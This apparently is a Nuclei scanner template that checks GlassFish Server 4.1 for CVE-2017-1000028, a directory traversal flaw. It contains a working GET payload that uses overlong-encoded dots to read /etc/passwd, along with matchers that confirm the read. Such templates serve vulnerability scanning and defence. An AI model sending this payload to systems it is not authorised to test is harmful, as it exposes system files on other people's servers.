id: CVE-2017-1000028

info:
 name: GlassFish LFI
 author: pikpikcu
 severity: high
 description: Oracle, GlassFish Server Open Source Edition 4.1 is vulnerable to both authenticated and unauthenticated Directory Traversal vulnerability, that can be exploited by issuing a specially crafted HTTP GET request.
 reference: https://www.exploit-db.com/exploits/45196
 tags: cve,cve2017,oracle,glassfish,lfi

requests:
 - method: GET
   path:
    - "{{BaseURL}}/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd"
   matchers-condition: and
   matchers:
    - type: word
      words:
       - "/sbin/nologin"
      part: body

    - type: status
      status:
       - 200